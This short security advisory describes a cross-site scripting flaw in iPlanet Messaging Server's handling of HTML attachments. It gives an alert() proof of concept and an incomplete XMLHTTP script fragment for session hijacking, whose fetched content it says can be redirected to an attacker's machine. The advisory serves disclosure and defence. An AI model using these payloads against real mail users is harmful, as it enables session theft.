iPlanet Messaging Server HTML Attachment Cross Site Scripting Vulnerability

iPlanet Messaging Server HTML Attachment Cross Site Scripting Vulnerability

No exploit is required, however the following proof of concept HTML code has been provided to demonstrate this issue.

<html>
<script>alert(document.URL)</script>
</html>

The following script code has been provided to demonstrate indirect session hijacking using web redirection:

function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;

"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine.